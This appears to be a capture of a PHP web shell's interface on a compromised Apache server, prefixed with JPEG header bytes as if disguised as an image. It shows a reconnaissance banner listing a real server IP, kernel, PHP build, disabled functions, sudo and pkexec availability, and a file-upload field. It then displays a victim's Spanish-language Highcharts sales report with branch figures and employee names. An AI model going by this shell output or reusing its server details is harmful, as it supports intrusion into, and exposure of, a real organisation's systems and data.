����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 74.208.127.88 / Your IP : 18.116.237.222 Web Server : Apache/2.4.41 (Ubuntu) System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /proc/self/root/var/www/html/app6/core/app/view/ |
Upload File : |
<script src="https://code.highcharts.com/highcharts.js"></script> <script src="https://code.highcharts.com/modules/exporting.js"></script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> <hr width="70%" size="5" noshade> <div id="container"></div> <?php ?> <script> Highcharts.chart('container', { title: { text: 'Ejemplo reportes Especiales' }, subtitle: { text: 'Ventas Por sucursales' }, yAxis: { title: { text: 'Ventas en pesos MX' } }, legend: { layout: 'vertical', align: 'right', verticalAlign: 'middle' }, plotOptions: { series: { pointStart: 2010 } }, series: [{ name: 'sucursal Gomez', data: [43934, 52503, 57177, 69658, 97031, 119931, 137133, 154175] }, { name: 'Sucursal Torreon', data: [24916, 24064, 29742, 29851, 32490, 30282, 38121, 40434] }, { name: 'Sucursal independencia', data: [11744, 17722, 16005, 19771, 20185, 24377, 32147, 39387] }, { name: 'Sucursal Cuatro Caminos', data: [null, null, 7988, 12169, 15112, 22452, 34400, 34227] }] }); </script> <hr width="70%" size="5" noshade> <div id="container2" style="min-width: 310px; height: 400px; margin: 0 auto"></div> <script> Highcharts.chart('container2', { chart: { type: 'areaspline' }, title: { text: 'Reporte de Ventas por Vendedor' }, subtitle: { text: 'Ventas Diarias En Cantidad' }, legend: { layout: 'vertical', align: 'left', verticalAlign: 'top', x: 150, y: 100, floating: true, borderWidth: 1, backgroundColor: (Highcharts.theme && Highcharts.theme.legendBackgroundColor) || '#FFFFFF' }, xAxis: { categories: [ 'Lunes', 'Martes', 'Miercoles', 'Jueves', 'Viernes', 'Sabado', 'Domingo' ], plotBands: [{ // visualize the weekend from: 4.5, to: 6.5, color: 'rgba(68, 170, 213, .2)' }] }, yAxis: { title: { text: 'Cantidad' } }, tooltip: { shared: true, valueSuffix: ' Unidades' }, credits: { enabled: false }, plotOptions: { areaspline: { fillOpacity: 0.5 } }, series: [{ name: 'Israel Alvarado', data: [3, 4, 3, 5, 4, 10, 12] }, { name: 'Angel Salcido', data: [1, 3, 4, 3, 3, 5, 4] }] }); </script> <section class="content"> <div id="info"></div> </section>